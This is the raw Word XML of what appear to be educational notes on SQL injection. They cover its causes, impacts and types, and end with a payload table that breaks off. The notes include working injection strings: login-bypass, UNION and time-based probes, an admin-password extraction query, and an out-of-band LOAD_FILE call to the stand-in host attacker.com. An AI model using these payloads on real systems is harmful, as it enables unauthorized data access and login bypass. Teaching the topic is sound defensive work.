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9349E" w14:textId="7C8843A7" w:rsidR="00C15416" w:rsidRDefault="00C15416" w:rsidP="003D69A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00C15416">
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291170F9" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
      <w:r w:rsidRPr="003D69A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="003D69A6">
        <w:t xml:space="preserve"> occurs when </w:t>
      </w:r>
      <w:r w:rsidRPr="003D69A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user-supplied data</w:t>
      </w:r>
      <w:r w:rsidRPr="003D69A6">
        <w:t xml:space="preserve"> is used directly in SQL queries </w:t>
      </w:r>
      <w:r w:rsidRPr="003D69A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>without proper validation or sanitization</w:t>
      </w:r>
      <w:r w:rsidRPr="003D69A6">
        <w:t>, allowing attackers to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D27D26E" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D69A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:r w:rsidRPr="003D69A6">
        <w:t xml:space="preserve"> unauthorized data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC094DD" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D69A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Modify</w:t>
      </w:r>
      <w:r w:rsidRPr="003D69A6">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="003D69A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>delete</w:t>
      </w:r>
      <w:r w:rsidRPr="003D69A6">
        <w:t xml:space="preserve"> records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461BA007" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D69A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="003D69A6">
        <w:t xml:space="preserve"> logins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD6F9CC" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D69A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execute administrative operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E39C500" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D69A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In some cases: Remote Code Execution (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B69F957" w14:textId="2B691C1E" w:rsidR="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="003D69A6">
        <w:t>Why It Happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D99DC74" w14:textId="039323C7" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
      <w:r w:rsidRPr="003D69A6">
        <w:t>Apps build queries like:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D69A6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = '$input';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1512E075" w14:textId="58545AFA" w:rsidR="00C15416" w:rsidRDefault="003D69A6">
      <w:r w:rsidRPr="003D69A6">
        <w:t>If $input is attacker-controlled and not sanitized, they can inject SQL:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="003D69A6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR 1=1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07658923" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRDefault="003D69A6">
      <w:r w:rsidRPr="003D69A6">
        <w:t xml:space="preserve">This changes query logic and returns </w:t>
      </w:r>
      <w:r w:rsidRPr="003D69A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>all users</w:t>
      </w:r>
      <w:r w:rsidRPr="003D69A6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FCA661" w14:textId="58D7C878" w:rsidR="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="003D69A6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3686"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D69A6" w:rsidRPr="003D69A6" w14:paraId="299FD6D2" w14:textId="77777777" w:rsidTr="003D6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89201" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="003D69A6">
              <w:t>Impact Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EC5E99C" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="003D69A6">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D69A6" w:rsidRPr="003D69A6" w14:paraId="6B4F99B6" w14:textId="77777777" w:rsidTr="003D6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0543" w14:textId="6E3BD3C3" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="003D69A6">
              <w:t xml:space="preserve"> Authentication Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6633C669" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="003D69A6">
              <w:t>Login without valid credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D69A6" w:rsidRPr="003D69A6" w14:paraId="62FE8A53" w14:textId="77777777" w:rsidTr="003D6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8C6B6" w14:textId="0837CE70" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="003D69A6">
              <w:t xml:space="preserve"> Sensitive Data Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C7C2E07" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="003D69A6">
              <w:t>Read emails, passwords, card data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D69A6" w:rsidRPr="003D69A6" w14:paraId="114158A7" w14:textId="77777777" w:rsidTr="003D6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D6C71" w14:textId="5FF7560F" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="003D69A6">
              <w:t xml:space="preserve"> Data Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5006002B" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="003D69A6">
              <w:t>Modify/delete entire tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D69A6" w:rsidRPr="003D69A6" w14:paraId="2E210898" w14:textId="77777777" w:rsidTr="003D6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2A8C8" w14:textId="2EAD6035" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="003D69A6">
              <w:t xml:space="preserve"> RCE via SQL Features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0241B748" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003D69A6">
              <w:t>xp_cmdshell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003D69A6">
              <w:t>, LOAD_FILE()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D69A6" w:rsidRPr="003D69A6" w14:paraId="4687DA40" w14:textId="77777777" w:rsidTr="003D6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374FB" w14:textId="4C50942A" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="003D69A6">
              <w:t xml:space="preserve"> Schema Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50BB8FC8" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="003D69A6">
              <w:t>Extract table/column names</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D69A6" w:rsidRPr="003D69A6" w14:paraId="165F1740" w14:textId="77777777" w:rsidTr="003D6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CA6FC" w14:textId="4A50F0F7" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="003D69A6">
              <w:t xml:space="preserve"> Complete DB Takeover</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A2EF44E" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRPr="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="003D69A6">
              <w:t>Often leads to privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53B1DE16" w14:textId="77777777" w:rsidR="003D69A6" w:rsidRDefault="003D69A6" w:rsidP="003D69A6"/>
    <w:p w14:paraId="745C0AA6" w14:textId="6E5FC40C" w:rsidR="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t>Types of SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD9ACBA" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t>1. Classic (In-Band) SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C41B69" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t xml:space="preserve">Attacker sees </w:t>
      </w:r>
      <w:r w:rsidRPr="00007EFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>immediate output</w:t>
      </w:r>
      <w:r w:rsidRPr="00007EFC">
        <w:t xml:space="preserve"> in response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565C5BB1" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t>Uses ' OR 1=1 --, UNION SELECT, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DAECA6" w14:textId="022AAEBB" w:rsidR="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Example: </w:t>
      </w:r>
      <w:r w:rsidRPr="00007EFC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = '$input';</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Input: </w:t>
      </w:r>
      <w:r w:rsidRPr="00007EFC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR 1=1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF49529" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t>2. Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240B171E" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t xml:space="preserve">No error or output — attacker deduces data via </w:t>
      </w:r>
      <w:r w:rsidRPr="00007EFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>true/false or timing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5882AFD7" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:r w:rsidRPr="00007EFC">
        <w:t>Example (Boolean-based):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C416A7" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>' AND 1=1 --   → returns true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F46E6C1" w14:textId="62A5C4A8" w:rsidR="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>' AND 1=2 --   → returns false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6F86AB" w14:textId="203FF017" w:rsidR="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:r w:rsidRPr="00007EFC">
        <w:t>Example (Time-based):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00007EFC">
        <w:t xml:space="preserve">' OR IF(1=1, SLEEP(5), 0) </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C91915B" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t>3. Error-Based SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67822540" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t>Application leaks SQL error details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DBF640" w14:textId="2B0C8F15" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:r w:rsidRPr="00007EFC">
        <w:t>Input:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00007EFC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>' OR 1=CONVERT(int, (SELECT @@version)) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DD9AD2" w14:textId="7E24EA4A" w:rsidR="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:r w:rsidRPr="00007EFC">
        <w:t>Reveals DB version in error message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DEF92E" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t>4. Out-of-Band SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390A271D" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t>Uses external channel (DNS, HTTP, email) to exfiltrate data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B4F5D" w14:textId="29745B3C" w:rsidR="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:r w:rsidRPr="00007EFC">
        <w:t>Example:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00007EFC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SELECT LOAD_FILE('\\\\attacker.com\\payload');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFC6758" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t>5. Second-Order SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41158837" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t>Injection payload stored in DB and executed later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72177986" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:r w:rsidRPr="00007EFC">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099DF7D4" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t>Injects payload into profile → later executed on search page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA6CAE0" w14:textId="4C46004F" w:rsidR="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t>Common SQL Injection Payloads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3"/>
        <w:gridCol w:w="2357"/>
      </w:tblGrid>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="1487F050" w14:textId="77777777" w:rsidTr="00007E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06381" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57F6076E" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="7420A193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AEF60" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>' OR 1=1 --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A5E0633" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Bypass login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="400CABFB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7672" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>' UNION SELECT null, version() --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B43B894" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Extract DB version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="557BD5EC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E8816" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>' AND SLEEP(5) --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31278DE8" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Blind (Time-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="4F70A3F6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A9402" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>' AND 1=CAST((SELECT password FROM users WHERE username='admin') AS INT) --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="189CB8F7" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Blind extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="698337CD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F21B" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
